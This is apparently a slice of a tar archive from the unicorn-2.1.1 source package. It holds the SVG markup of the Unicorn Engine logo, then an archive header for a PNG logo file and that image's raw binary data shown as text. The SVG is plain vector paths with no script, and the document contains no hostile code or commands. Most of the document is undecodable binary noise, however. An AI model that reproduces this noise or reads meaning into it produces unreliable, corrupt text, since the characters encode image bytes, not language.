CorelDRAW X7 --> <svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="113.496mm" height="95.7057mm" version="1.1" style="shape-rendering:geometricPrecision; text-rendering:geometricPrecision; image-rendering:optimizeQuality; fill-rule:evenodd; clip-rule:evenodd" viewBox="0 0 11350 9571" xmlns:xlink="http://www.w3.org/1999/xlink"> <defs> <style type="text/css"> <![CDATA[ .fil2 {fill:#FEFEFE} .fil0 {fill:#E62129} .fil1 {fill:black} ]]> </style> </defs> <g id="Layer_x0020_1"> <metadata id="CorelCorpID_0Corel-Layer"/> <g id="_307418024"> <path class="fil0" d="M7101 1434l-1 0c487,-344 1238,-810 1653,-1216 2,-11 4,-25 -31,-17 -121,27 -433,159 -512,209 21,20 106,47 151,60 -50,6 -96,-1 -140,-5 -129,-13 -220,38 -344,99 -41,20 -79,39 -117,59 -1,26 231,92 280,88 -78,15 -136,9 -191,3 -85,-11 -151,-31 -233,-3 -113,39 -249,120 -353,173 -1,32 281,131 341,127 -240,21 -249,-21 -421,-41 -30,-3 -64,0 -113,19 -39,15 -205,96 -272,131l7 -6 0 1 -15 6c6,37 35,99 38,145 3,45 225,145 273,168z"/> <g> <path class="fil1" d="M1118 8018l0 -1025 373 0 0 1025c0,311 -155,466 -466,466l-559 0c-311,0 -466,-155 -466,-466l0 -1025 373 0 0 1025c0,62 31,93 93,93l559 0c62,0 93,-31 93,-93zm1084 -339l0 805 -373 0 0 -1581 1119 895 0 -805 373 0 0 1581 -1119 -895zm1830 805l-373 0 0 -1491 373 0 0 1491zm1457 -466l0 -93 372 0 0 93c0,311 -155,466 -466,466l-559 0c-311,0 -466,-155 -466,-466l0 -559c0,-311 155,-466 466,-466l559 0c311,0 466,155 466,466l0 93 -372 0 0 -93c0,-62 -32,-93 -94,-93l-559 0c-62,0 -93,31 -93,93l0 559c0,62 31,93 93,93l559 0c62,0 94,-31 94,-93zm1829 -559c0,-62 -31,-93 -93,-93l-559 0c-62,0 -94,31 -94,93l0 559c0,62 32,93 94,93l559 0c62,0 93,-31 93,-93l0 -559zm-93 -466c310,0 466,155 466,466l0 559c0,311 -156,466 -466,466l-559 0c-311,0 -466,-155 -466,-466l0 -559c0,-311 155,-466 466,-466l559 0zm804 0l1025 0c311,0 466,155 466,466 0,274 -121,427 -362,460l452 565 -478 0 -448 -559 -282 0 0 559 -373 0 0 -1491zm373 373l0 186 652 0c62,0 93,-31 93,-93 0,-62 -31,-93 -93,-93l-652 0zm1829 313l0 805 -373 0 0 -1581 1119 895 0 -805 373 0 0 1581 -1119 -895z"/> <path class="fil1" d="M2004 9551l0 -638 598 0 0 93 -498 0 0 159 327 0 0 92 -327 0 0 202 526 0 0 92 -626 0zm1409 0l0 -638 52 0 405 448 0 -448 98 0 0 638 -52 0 -405 -447 0 447 -98 0zm1846 -248l0 -92 262 0 0 193c-36,54 -84,96 -144,124 -59,28 -128,43 -206,43 -117,0 -213,-32 -288,-95 -75,-64 -112,-144 -112,-242 0,-97 37,-178 112,-242 76,-64 171,-96 288,-96 74,0 139,13 196,38 57,26 105,63 142,112l-76 55c-27,-35 -64,-63 -110,-83 -46,-20 -97,-30 -152,-30 -87,0 -158,23 -214,69 -56,47 -84,105 -84,176 0,70 28,129 84,175 55,46 126,69 214,69 55,0 106,-10 152,-29 47,-20 79,-46 98,-76l0 -69 -162 0zm1086 248l0 -639 101 0 0 639 -101 0zm962 0l0 -638 52 0 405 448 0 -448 98 0 0 638 -52 0 -405 -447 0 447 -98 0zm1413 0l0 -638 598 0 0 93 -499 0 0 159 327 0 0 92 -327 0 0 202 526 0 0 92 -625 0z"/> <polygon class="fil1" points="0,9165 1300,9165 1300,9257 0,9257 "/> <polygon class="fil1" points="10050,9165 11350,9165 11350,9257 10050,9257 "/> </g> <path class="fil0" d="M6093 1928c-68,808 676,845 742,827 143,29 409,219 409,219 19,168 46,178 119,216 169,90 504,48 596,-158 108,-240 -244,-791 -381,-961 -171,-211 -25,-195 -113,-398 -50,-114 -146,-235 -238,-336 -44,-25 -232,-136 -241,-182 -2,-14 -8,-32 -15,-50 82,-41 348,-534 371,-616 -193,-13 -642,82 -703,233 18,76 95,130 112,206 -120,-51 -172,-117 -292,-167l-130 -761c-315,130 -399,508 -365,798 -331,-279 -667,-228 -1127,-51 208,6 316,80 361,163 -266,94 -570,161 -1121,197 82,136 254,233 389,258 -92,61 -845,-136 -1223,557 199,-199 740,-294 870,-68 -214,106 -242,312 -608,374 86,95 355,102 539,95 -464,216 -780,610 -1364,699 501,155 749,74 1051,18 -278,249 -557,583 -506,1176 59,-275 360,-529 591,-410 -122,205 -326,620 -669,844 309,48 610,-116 760,-221 -167,266 -251,557 -394,833 79,67 162,130 248,189 12,-10 24,-19 35,-29l247 134c3,25 6,49 10,73 56,30 113,58 171,85 15,-40 35,-81 58,-118 24,59 49,118 75,176 368,150 769,232 1190,232 1063,0 2002,-524 2576,-1328 -86,-12 -1934,-233 -1529,-1704 -337,-164 -688,-486 -501,-1044zm-790 -679c-807,838 -83,1836 699,2200 -576,-416 -1302,-1282 -699,-2200zm-737 870c-408,546 -247,1080 64,1388 102,102 229,188 370,267 657,365 1590,567 2009,1199 -159,-412 -359,-636 -616,-799 -603,-381 -1604,-489 -1884,-1204 -94,-241 -81,-522 57,-851z"/> <path class="fil0" d="M5319 6134c1651,121 3087,-1120 3207,-2771 53,-727 -158,-1412 -552,-1962l-9 7c250,477 375,1027 333,1603 -119,1642 -1547,2875 -3189,2756 -974,-71 -1804,-603 -2293,-1366 442,957 1377,1651 2503,1733z"/> <path class="fil2" d="M6976 1558c117,44 208,189 330,310 -118,-13 -192,-47 -279,-53 74,-103 -11,-187 -51,-257z"/> </g> </g> </svg> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/unicorn1-logo.png����������������������������������������������������������������0000664�0000000�0000000�00000165737�14675241067�0017361�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������PNG  ��� IHDR�������|)��iCCPICC Profile��8UoT?o\?US[IB*unS6mUo xB ISA$=t@hpS]Ƹ9w>5@WI`]5;V! A'@{N\..ƅG_!7suV$BlW=}i; F)A<.&Xax,38S(b׵*%31l #O-zQvaXOP5o6Zz&⻏^wkI/#&\%x/@{7S މjPh͔&mry>k7=ߪB#@fs_{덱п0-LZ~%Gpˈ{YXf^+_s-T>D@קƸ-9!r[2]3BcnCs?>*ԮeD|%4` :X2 pQSLPRaeyqĘ י5Fit )CdL$o$rpӶb>4+̹F_{Яki+x.+B.{L<۩ =UHcnf<>F ^e||pyv%b:iX'%8Iߔ? rw[vITVQN^dpYI"|#\cz[2M^S0[zIJ/HHȟ- Ic<xx-8ZNxA-8mCkKHaYn1Ĝ {qHgu#L hs :6z!y@}zgqٺ/S4~\~Y3M9PyK=. -z$8Y7"tkHևwⳟ\87܅O$~j]n5`ffsKpY�qx��@�IDATx|ߝe[.`lK'CsbL3z(>z `&� % 0`:Lq)$�w:inwNw',̛vf޼2oDb@R-s^)+ΗD i! x\Dp18K>"ǚes2pp\O!+N7ú.]n] +化Cdf}8O*>U֫s] tE Ħ+~ugfF$pUA#%#tniR1 ֍s1U0~ x #E Yd%\yo]&t2]w\ p1b@U(H:xP 5|-#'R/b3a5L_KF10C*tJK`(yc%qN43\jߏt#\ tB bNQ.e%"C-JV"ifxjJֆ?@.߿fIf8@gĀKl:Wu kEl˳uRyI"Bnx~W$H wa\ +\1Z~9ջpd1wn0y0**'bdp?i4= -eb+x7@>clmP pXs]ڊ9v0k['Aj5+CI,СѰ|8l m `MvnL!Rs3Ld#_`2nNKVj/'.5 L~=loxF$Kg;VtV8Q!wEQіÎ&5,m"1X|O3a י 9r+s] d3wb텑1ox^vshvq] 07MLL.0(*qI?Y(gTx>EWtH8u1- ̑zDNe6Bcr ;n Oؔa4G*Rs:͟L)ynT\G+0!}<T!) Qkilƣem1.iÅbȤ7MH`yO(I18W#X  ⶶx@f00W\*DFv8q˚4^۔D.ōu11 a& {2|njBdT cM7+,nVo:W%u\bCn6N kJbsn$n[,)S)b l`F)\(3 3 ԫD ]p"Xra<YW_*@ s73[d^cq4/#7c@9Dc- MҴH.IK.L�p"WB)yYN "zSvc"710Slep230q FDMLh\b]Cd�D}D}6s@F5O&QK !LŸX1,XƉ||o Qb3b�F.=_Ĝ4 -2R&k*k.1c}ǘ+ϓ?Io<yzjA"ɔdvI ƎZ.K4=yڛWߚg`qoW VRg0Z9Ź ;n0N"84V|99-LeR}$g2 )x5Y2΅|`a:wp5/!} \b <] ,a<xr;6̩vQf?PǞxaeݒ1W^b2WɊR-'YSTq[ ;|t NOVm)wͻwĿ̴-50P%RxQ$;Dv[˸IcgL5y-TT12tvLu4O<%5'U-:L bթ^I?2m } ̖D^c+Ҫ!u,x3Ϊ0]\-)C^ك U[,.JK4%6bʅ|M7$X&?^u23_*`"EC΃IMx%GءLR`g!Dʾ6]xևٞ>`\<!?8hV%6E0�]bLwE'LUL+ćugtt9s &ӏDǻy|'ߢtjRKY D0+ᔊ?شnN*dNJm2&30]*7+El! Y RE:Hѽ]pwֱu}zIGn.K;(N 'bd3ZHbB7W<5UWLWгYz07E3;а1NQD&؎�g 6 8֪WQCp"< It6"6�iL[-~uMz[Z'�: 4{.sbJJ֜ ! v>NzG̪^7.R)|VaLyRj.Nw.I7F:W$+~^Vnu9a 8(ʯ˛ b,mex,*+ŀzƵt+,fPQY#ˏJH%&,0]كh7rqd^?ۥYBtEW'o b B[ii}M q9 �N ZsfdCdvThpҡ[˪%qeBLL@lqGd>!:s<RF:@Nbw,V4&X+C`:Hׅ/"}(mf_^FFGV8- iKl Ӆ1gD]\VLt@T�]Ҹ ଒|weh gYq%s_UZ[1 pކ"3X1h2e%kT 'ϗx$+ b7ѝ|.f71EKћw&mԾa{"Coa$ Ad` ך>d /?q!RYdp-"QR" F'Mg{8m3&$w5 xJqKNaFȊ_LrcL$z2c*sGΕ 3ia(6d*d00Z-!BXZ!>Ÿ$S : .\ a�E-~ۥ⍩&6UMbbSc PM(rE5Dl,}>B9&P*9A pbKo00M*#2¿w0kgz뚥IgpO/5Qɋ(t+MCYrR︭WZKl2c<�oc"+w`%p9bngZ# be,Y+Fo%?ME>"G+%n Nⷲ\|->h DIBψ.}Ozs&\?ȕ=Qs~eHWd7\VLwg<x*AcFI|'t&tt+E|5HR; ) A 08E}0IwJ<8~Uo2N$r-Iװ@@p>AAr~TwoŅx@<Fsc,| !j;m; l#}ӽv8F{bŀI,jlN*B'~ŽLt<"p2:.#WqKDQU8sD$/Fx=qs| }37:]j,?M@tCz#;5ݮh(?n`ŀ1`|z޶d,voĽ#ϑ}C Z<Rptc%҉9by4;::ܑ"BÍh.G  Bvb .R�)f;cl#<0 <<C1%!h1p|v@[=-6)wc1fnJDU*~߇􆎮7\Kl˜p] Xbhnn}L⿈EaAEyFZ 0129wHplѰv3eaX7p3_>15C6[lb߭;0`485A:')j'84%s�.hJ^"Jy&J�y`8H}/X ct<]WMnyi.?6tÛf7:!n.rNf5n7'qi-rYn)0a9KcI7;rz716Txn8.ۿt|JVtȚl%6n94NRVi|̢"5UT+݋8$ xZʼ ^aXi*:=-#&cZȐX ``֮:.!7Kc@+N.cޡv ElkN dž抌9PGv7:o׊1s&",KRh> u[VK.B\ؖ�1bc&U~%2!׫8:-v,𽶘dGx]ic]CURE}hπi@h\ &yC2y]@*elŀ; Z@ґG˳+VĩlW1Yiׇk,"0vB?Al64ǫKڰ36[IᲸ/"c;Ȫr1 4̟,KHAǃ(ctaM%|1zR)%6`e0)تL \'Z3W3cn|M2e6I|`eT3Q| UWcJ)R%Ӻ7ug6X|#\ %B~q!iL IC% =@1m-ūt擇Kݣ �w8Kl:n9RbG 2f?S8R.k.Opzj<sr, nrEl@1z]1r!ѼF<FK%ΟT=[Dߟ;lӾVoL8Y5sDLݧHzy"ao  ptGږpqnp1bʒEviLn[K5<ďI&uI] %qͧq1 :WF--42s]~BxlsqKw8>Hz>Goȼ̝B;!]|D Lh.~nű,B %V[potA(\!FU'�029+'1F}o*jD?s#w[ˇٍ >^(MJGx nHJܒ̤&3xuK�!J TS$rW MglG۾3q b|R.38e9{3-tYvWN13"׋m+6Y !tP_DZ>s0&&/;/+-KQI₻d@xKL% VnǗ8|+s({-EOSgXyHXi۝ R ⃠FZi aOt}#5>o]Ƈ lzFGElD8 jR,xxV�窻x}9Klrku(7rTlV Q^,PCPX{ Hc iSQ%f 9䯭D�ѷoJ#q>L`O-'uz^ k"S`2{B&\y0^ Q4l>#6;Gq;B9J9mcd,'K$b 5 ,} q2 w{Vib"]ϯaf: ,`5+V$*<yM:f"9B!eERt:nRdAlnzF3Q?Ja P&/ w/w/C8hؑkm8=yzX}9'؞p(,Dk+\AdE.xT\(ۆЅ(fo7# 0Ypyf? Yhn-GH9{U.b}wT )ޯYH\�grmUV6ݥ@-nL[%kV~]ntҍu1`€Jqm<=.T< <͏=p1hZլY*;)ʀ)?pY^ˢ jgOL"ɨNLOAb؆QE7mG 7Wb~χ_,\Y%+GBvיmcb�a =Џ,&S8:=H1aһp,5:-:Hɦv`Cl [j2Bio[B.å-|1۞iP;Fws#b› ~'fU}Vɺe|gW Bfo8WxpNJnǀHϽYƣsV0Tz"nHOPo,L(p[ʢ%܁@T7f>>YkXh=nTqݙ%<'}'J&/m6<<FVx) ))QC8Dž!88{>O)`'D=P|6j?a`׭TJm+y]0mjpub1>O6-gi9 4?6\j? &fAyLdDБtY° xYw;A8.saR~R9^'c6YLJh^L]#CM˵0_U4KaR gn%njp/> =h3G4,!utHѺh c@wUR#҃Q*"DE,ª 0kR?O&"GI D֑r'Qxϵ]tܬ{UZb, p4{3 nR530j%\q}9C:IqN[l8P oa` Q\z2eYX{A}Gog6d-3yUW/ݶcKnΒrp1@Dq: xz!009GD|5qIC$ j~W*7˅gwa-߰n~m-~5LҦhӁցqxR˦0: ͥRY $:ag޹lM =O7s}J@,ci#D*b(Ҫ *p*z1W<G11*�a1 <!Ʃ3yWۻ .|=OJͫUwubye谂Ib28/\:ĶUqR|g;Wֵ̟솻Iմtq<06\]u}fxl"Үo:膁?!|S2J*a3l3)CA#{!R<r�cĬaIDΌt ,.jE_/Fi^U"2(gE3+X#vj1Ed睔E7[N1FV-˖i\~qЂhvOf =s>b>9)!^"]m o,jy,KW٩ Y~1 l<}% X| &q�s`H_y\e3ǃqM< a:wb-Dz:#=;39ؠyiyV| ߾RAœUJqe{}"#f[m!Y`K*BmRͦ:AC,j,`LGu@[%7ֹ@_0/Ƨ?sfb�A0b$/GX,M~껡`@OW!Wt7gAe p2;w57̄Es>)՛Ύ$4)&V3I_*_pC =(΂<:zYHAetvŒE- hY$4Ԡf6 Ҏ̱s|`<Ұog%4Kش~|г0] sB.U~Jͽa` isPC]ߋ,ۅaY$A0rɪ du]'11/Qx>$ЌY9S8>ӿ*c"C|˒圃 x2&MB׽#*L8㒁l}FO,+ÝͫFolJ JLX$R=Ǖn6|2 +SJ"!= VҮG�LVk4SՁ:D ם/=fK-AABvv+ &30~0s!#hF1Z˘#b+;")9Km !2op0](R4l~\: 69G&mW8­RcňTjc\\J><Jk: ̈ҧl?6,fKW.R Vgg\(%6a sٱ[@%ZeQ럐>z{unyTTߪ/X[e7I0Ջz(ϱ1C*KpqKKˇG30u/7%pJ6qJxK4DWKM][0*FKlrx\Uevӱ7)jCIL9e?wy~>Mcj@vC'3>Y} k!%yZ1Xd#[1966z3AE۶u&$I6$'!ZQgAhX]#5 i-K?a֓v LhFH C]<b wX]AM+PU?C@Ê ?Mܸ&uﵕO-p 6$5΅VS|՛H&4c6] CfU> <i[mռڪQCvb8I犄]n},Hk6$\\MW#4ƦrcsT7:U8wK[c 3yt}l[CO_nmz{GRh؎~'ǢdM^&eʤ6 l6"\$S+=XL'Xι\镂?ǭOl2i(8piW[xJFC!c9.ԓsLMw. c"t2I\a>,~⻞Щf[#d,v/-UcEw z- <܆Bh*%buY&J+qUf\dGR9@9񞞠\%h+%{b8F5s�# ^ RUU?s˷ Ve2uܵ-Vg]IG7Dc%2Lqp7C" 03Q6 Ah^oF'Z S LD2A/prC%8ȅbzmin ep 2IסB 8Z@igY];a H$�-.{.,azf;s?j+ /3cϞ|tYʹy' #-ݿ&M/|#&b"ßw`r\UB(EV5$dz-Qc߹tWпٵk\ēJ=Wdzl[6oG bMI S`HQ Dʶ�\[8m-T Ba FK/!(w3+bctTy:\ʼn nh# SW8v\;t`@ (+ !äϺж@twVoMԈ7Gl;Gԙ9p_^Br3UK> \v$:/⃊Mħz J 48FzZ Vd y8ԫR >dNF.atEs%x^Ŷ}I)_봾ά{mq78ټ~ėPeY2j:/Gm{R3YPTmqIv38:f=mqYt;tY+6("ֻXDS$pME$"*p<D)ZMaq~2 ? |l_/t]]ǟҰg2WەY]b/+OJM ܩ*%s;f8 'wEd?sħ#1$ ^v"eSt"+Qynt|&JR^*e3T6#.zh{pVS0hSyk6p^ao攮 vC&0 ~#2@ LhB"zi aW7W1B1a3ч\-Si o0=KL֡oV׭jĘlVi}͇#EEtﱑJXԩsײ&4c\B;]bv(P?wL8m2]I(+fgz(&3!T5J3hJpItoԛKѡ=n2.~5Lba@|�']i#sD~3TMîhkuOk3]<s7I/@,`n*hpTjQz!fԛ3"ة)ky"]\1* B/+LMڷfA:<8ŕB#ܼj9;<ռPt()Z) sAuxʷX0ZBڋIro rmƳ)Z#:]�`;N='p̭B`: j4~ Z2twٮD-'pĆ˕\|^ ZWz BA<eAv~ v)XN.z:levcOh ܴ%Qf|b"4s~G]2՜ͪ!B|Õ޷ Ճ/uKJAngycx廸dTnbFq120?q|$4p0Omr6qN#';2([('A腟'&= ^4F1:e^RܫDexL(&EnhXw>sp|gZ "]nثFi&7>e"5MTs JE6Kwɒax}ήwGOk{T{J>_.o/+-EYo`5%6I~=Ks%] R{x UW+ <Ѱ]CR)8ٔEgc! DýR|E6]C>|D]{PDرo|]®SR}3^R9K"dD"T]p7O=[ :λQ(sNwdޯM9c7?RnH`NE̥]ǃZq)RIW0`QL2s-"XJ| F[} mU"@;T6iW%KcМLԻA_)2 jV2TF@2N[8Iḻ˧/bw $TT],=X=kw,Jv98~+ ƀK`�8p/ _h"N$[q?fo\[pB&cBaݒ %c84Q]QK3!nԳs=q|KCDǑ~V7J`R;&xDi?| xOdHR"5諞7`)~~aKib8xz84ܠDz+8#ħ՘ gR}"cvnp��~AT_'P7LV;`(ݥUvo)k-.NR'syP\:Xʼn^tV_2Rўx#iPd)X(s Dv=bB61`R=(:.T!//8Ty\bcCff210g :H3 y&FڀC~!h1? h spsuD͝S>+ٹ$(?r)]l="3? \O#Eiފ_g'~<]=vS0pC43ŇANyt;be%:Pxt=#{߳%oqD�s<ΣWpz$: MXP<kPqRZ.=R83J@dmf,f;7M\gc|N}|ZjNVd{yZKlLU} H9n؅T_dA9[(͝w|&|t' /?$&[׭cu2gt/%.hk|s4i 2WKOUH�>BuJ` 0ܠR|c$mtY{Z.5R<S tI.߂y4ۻt? a<CM~X4^yE,xLغi 2v~ <~eDXęR-.qxNaԏ#MZ{< rno~= dv˼h2,y⊟)!}{zƃrA-{^0F3Ý&K�]ش͸sN NsO^qƩFiZLAD6F^*f7{1L 9ε4]=mєJ#\l@:c4 y0yhJ%6eRNfm_ 5k|7�-C}H!{&T1o4sʸ{n1*<Ms]us1;OS78T.Oxubc.Il8x;Hp47sJUB{qz:)j QЅbT ᅓ\¸!0XĀN:WwJcLgގBtt-#]x0kL>=\v)A34Ay^EG#iGS} :\>6qd~cx~1Wƞ5Wu~ Dm CYZa V6JA#]k762Fwq&DNg >8?Sb0>MjI$^tɵi[QRq2'0yqtN5}c^\,u n&Ogߠ춦v;c6HFrEVN' şPW6ܨ$Dgw"jS}s3NͯGf VeHûfR>8T7N+Zk7Ix'C1lةH<A'-'8VA-'иraun´Y'PNR1[y~2χ> 動rz6cQ3V|1&Ǵ2p4_x';5Q7<"8;}Tiw0QZ*jaG|2[-pkm }�+sp C(c=wSYI>]Tnֵ,QUTb3 g{;MhBljWM6c^bVK;pvw2*d9x_ *K~؅c1 &-F߫|4+/'Jי:ۃ!AR3g̽ZV<ebew'v>Eb_'B4 HIf'E/*eA (pۥ|:Yn)v%u1<nWnd0 LK5f{aPYZL!j-WZ:'+qި0ұН| ]F5eg_P?+9%$GBs݇4Pr/}`6Os\1ArCtq#hMYZ7d |_ O_01.f\,d\`\)Cz]r:A$5gT尕S;Csu}1#_S⁅c;N&t! bsFдR/y;=;Cs]Ä/#&KDžG;cbk@�)  1`(zfq̫3Z.Ss*Ou^ .4äd;ni[WfߤX%eJ h)fgCF-Vg_9e|I. ")D]ޟ*>?3{EyfERxkNM'}ݤdo>髛7;1xnu)^z:lE@hFI1/3|GG")3@NX)GBJRN*{Y<ESZ۬"2LN!эW)<58yS2XeBy6񈆽|n t;q?nWzG{o=jQ �0M$o)q:-DWKp-a'¥ԲFG 3\܂GGS+61 gyb <&>`SAo7HOr@";!@/~JjU'΢*Mo�n<\okiS"Cez{_%o@ :n~QRqbe`<@]dℎ,Ѝ X3̖ %{RV+,i}H,Uit2ޚ!: goD:Yj9pdۣer#|!y|) %Ziqd𪃊 ,LW'͍f|F#muB~ȢcRP* eɪq4v6N}K00v7tP5I`wCԊI3L.QjޡRD7�M򤬐X~\!kwN~ɮ3doJ#S1/؝:vee"~T.e/1ŋx~1s'On;F=wﲀk8 ])=,.=w;XXK>"cx 2W/*~Sb}SO ɱ|VXZ8xE?6B^=Mqc#6ofz#O&K։˖R e b�V=ԏ.Kk-3tp$@hnecF3 ,/K ꂃnW/^z ^U&q)Ąrp 珐W3X*u.Vl\Fos2YK !R9D5ay6*4= zd}3owu .'Qco@nba ա,VOh$�JD8].67;+  a̷QUɏ͝>1=g'`8O~*ۭX ][ڰ F7OdǍ.Y柭ip*HY<k��@�IDAT~C?QcgџV<.&$<!o4Hkv7Rspq+u,rzĶ-,6"xp̑/qrS; |iD|z'ɢ7Ǎ}o;$%i`odiDpit.wḖ_MJ72:FI1-1tl;,{p <  K2nZjDǥҞ{j0-;8#0Psjڿa<87c0Ethp45:)ƀ :C`nI/dLZ''sUDfƔ*{W$G G$|@Sy3 7>|gY|aBtM= ](p<nh-c ,#n[_+mGV1FvȘwrk4!э$γ¡sߑsaD-]񗞙bb9OlZ^໔$mNGAxS>83UC߳1ᵚ6m!gdԫ K_RoͬlAW#<_]^R/`:;6:}O?S݂2s]0^c8 ZZV-1Æŋl.{SmqwIXy9)\2o 3Di Dqw} pdP~vuҸNv;9Ml|IY) 4Z,QXCG9&׈ݬsvXMm7NKYW"^ciW~ rD7K$l[s>+)O7^O'W*;0$ BXȯ8j?Q$yquN46bK.iBpZ'5זL\*cru.In<L-uaB-G51&&9|_M+TlpmVaR*j jIh4rH%}!C"#:[rX J6C4]Gvi"nb~w$6-.hà,jUH;튦rFm LZ_=6#gis/D2�SF rnR)؁f[ jD�J(OkF-{0/Jv.37 /T~y3epov^u蒆:C#6MZ|%FEgƚfi84+CH6LqBzף;R9EFnWW򭜬}<{a;LKЕ<3p_=<:mN ~yR"իM-^x3?J 얬?pK#l݄@,cpq%4t|L*ȃ0S/7$K,F�ˆ{ ظDoU.o>e1+Oʀ-`><.,Apn Zp 0!9R.;Dolno6@d!9,HM'ߥK<A4n+$`!4AhZwWL1w00MT"=Llp gfGɀR-/ 5ۑoQ Eq z�zTo^VAmms.6 8 ZYFSf8}f$Lw6p0ǹ@!R<MGSإ=We<2\l]&=>PG,vNb3-w#p4!71P؝\NȷVmOC|Q4e"lZu:zv4� D$mdz-}/֩mR @. n8eF3\YϬKʂ3hc4;BVv<S @lb1ſ(Y|{zBh]}؉$3, '!BC Jj~`dn3Q!T-P mKp<b^ |.&!*W.I6^s,TˆRQvpI**+s F @>Qy?H܆qDGbpX<;.VZ1XlP_u8œʪchehhWDN{o. 7lb7=u=e3a g;yr Pb^ &θ4ڢ0Tl0ޯ7 D ޓ#AԸzPnjcGCיhÿ 㛤D8b5G/^ǡc )°D-OǙ?΢gh/sL-GYpO`nT&1:3�fЩN2yId[ "Noɩ$-ݬdHt'Ɖp4H,pEB- =L�ߢJ܆C`f6G*c7�qUc4mO7N# H'll%IVTzMwIkkUQ/H⾦9Il#7î,z?6ȪF@-XټaW?tpDq= `Y?WD"ӱ": 骱_to݁Wq~ G>pbi둒rmM Q,sIMO8 4;mPq,Ν8oi;{Ue.Nnr1ɭ@áwѬl:.0>pj9l_a kw7aw8nՈK7gT )& 9KWW}ѐ)8in! JvU`%yN#qi=b[X%]4?.V1bЪWmO G)/_=@N", јј`yo fƂſ5ʃ5Nj$ƒ=Yaߟ[?L7Mn,Dr C8Idk;ez!%wب#O.:n[C˝4S҈piq&u_|Lo{'s9sj%bj:0?}Rw2]! ڹL SkⲮ]hL!-z78cRڄPɧxID jG ћX 1|wn+cb>ͰtuvPu1,Z?Gt#3!6q.^NdƳx>I?Þ_唧#Mozh4w뮊fHŐbcԏmO`|gnL%] t;Qel;xxȍkg'tց>熬SLb�YR$#4- gd̘!ijaEh QW4\BLD:" sKY@;0 ge~ʎ551(H7>͞`L o*w] 7.l~r)M٨ XMegtaJۛ4ƤuT۰tEjo (xucw*f}NMIp +7gqc30.wζ0qWTM}m@@l̤%0aK3qeE%ppx)lgakr7vl|9͵NFwq84< ]B *[7'IhD Y}AdsTCtsdAWNǛV4l 4�k$Eq;rtN[t㦥Yl ,ReL:u\dލ/JGgX-;qs[ĖF(G<${Fa~=T4b#:-ޗ7I=OXnN{zpF@<y3\8t^a]ˎu`]yI[`ldӍMYlp nĞаabT_� |Kh{`Hl eS `=|Ьc{pg%4X0uCDj6cQ߾XվͽVV0n8Z*U}v0n|z15bSlCwb}vN3JZg?ZDbU4J?׏LQKWIds#4hN&uE3̕�׊1I½=SޞλדǶ:F؉{Ԭ-뜱YA<)߆N(EQ=qTMS /З:jis+O[R7qrZ%n2k܏/7jRM_?SJoJ\æmNm'"W|VBuG>GƘ:۞?Kjj:;0 Bs\WN*oa4RˤV\UY[[eYoTAp<L³`{Q2~޲4UdßGSYa;،ߥ,T# N58x'r<`&omHS蠥aynA,Xݘlm|[~Z:q6e>uV sF4N mJ>p%%(#dҾ3i]cvt(W9#,拧Uέr-KZQ2]`XLcIԟ04'@Y^&^N̡IZ6Rޭ-YpN#_B3\/?煶W/vX_t7}Ewk(Sir'O90/,.op[[)lw)e8ئW-a,~%Z/N+3 $'DRqVpyewB=dƧ#6p}$@ fT聭&+dM]Ϋ!;X!|*nZ{$ͪ 3nŀJRjI( #\XNBlk3:!8ۥaC͇"e ۝"8{T"zƿn'd8#;QegW)?ڢ-2ǐ2[CNd.Nhաlϣ^_< ޺kk$c0E5vn|bbTN`tjN/s)nRNYT/9_>B)|YZ5Kٺ$'-aWGKJ M50]/1~H3z#r5*s|_.9flG|@Н#;Sr0&H 3t,>%#z5åxq;Ń˅t6 ʯs-ߡ)ު2k>*- .bsCuɖ7bݥM-BdƉM�}yQ�9Xa6 w<l]j׋ X.9N(2k>f8n>Rñ/qέ"<^Gl ϛTc3xŷ=!MJ�%6sķ;`vp\'u " eu4fkK3U97Q&o}�ql/.iBJ3Jqle;ŬDGa~y,Lt76 dبBw'-b"5J `l϶q]yGvVL`'́ϥ<]'f(}i;Py")|#t9%ek<zn *Ս4QMmkY T\�hN*ϻe\n\^kLS:Tyz{ڗΙwnoU('!8/YeM{ n2BlΩb>_Ƒ/*X"s(KşS[9m3]6*[%瑂 %paiKm̧Ssms/)-;IyZ̢YޱaTGYv$Gs# cefݮca Ws+?!=76b.ϋ@\\ p6y<T]gr8¦lƓ.fK>LCYK/EtUAE85Jw12SzeGl�GuBXWS0 M3wR}%Vl�`Nn9Ybcc ʴؚc <zr4l<-}]x'@5WW7kdzX`7I `b ITKتbNn#-& ,vl Pޟm#)zZxSu>5YK۟Vt.w;d>r殴>>yWC¬s:O>[ ؠ0Ȏ�'Ɵf-"a -3 ~O7q]tӳ/ݬp�&fY%5oH$Wl.x ~TVej<*gRGƳA٦x(x6nt JlRGv8:hLnFo~7;6m3L-M :8X6D>5KCxdjBoymm  . {" M;@pL&U{>V*ߙ*Y,dsMxUIcJ.Yh^T6b3M*QaCW̓c2828W|`5 -sAv&68LU!bT}^8:Ȫon\10\^*BpϧGJϑJGOoQfJD|1^ckA7X =,Xu7!W)%N`@OW}]t8/e`e pWDE'027նuvjGo56g zw]Bllug=O."N㢟N462X\'EuݷRy"Nb.&o;X�Ӟ\hGWkVk8oNjτS<|`a>pl^pRZ!%pKXbF s~ w_6hݥL-DhKjs)sE.se (dmLwYF~!⿊ͳzR\E~4o7rYkWˊShxՠϪ{q]yp5[Yj�VybzVDa'nLG`�Ƣ'ſ7@3ت,wVLsN4A5ijWޚ!C̱]ĦAhGy44X? 5]Dd{qAy`gߒ(wC36Ly4DgMlVCOtNɯ_mUv-pstvs3Œ@>\ ..�iA=u@VuJ± =a"mobhGc6#a6Gg,j%]#M#3-W$E MT|{mD|'9(CgK18 WD !5l~ܠT*aڹbY@~)#rnԞj3e%!^):W*6hk4so迟zFuL! N0z/ AZ4|gg<Ѯ*'z(ŜN8b;k *3L_Xe!|g%_ͣ�ȟІ )<w֯ܯ\Gw&9, ^qYs]'Jl7]Z w*b칱K.\` \,-yE[܅x/A|Q[|< 9N-F GJV Np5-ebS F\Aչb^bdʍ О-˖EƶMWM+rHσY�5RjY%%9|dڨ#%=<J٫,_Ϩyg\xHmusRS"63B(ۊU cZ)52E?Kň:= ~L)8;'qQ(eK0BxE̮$[f٥a_n7>CחO)CU4OXNfZY+ζ&ׁcb]ASeM 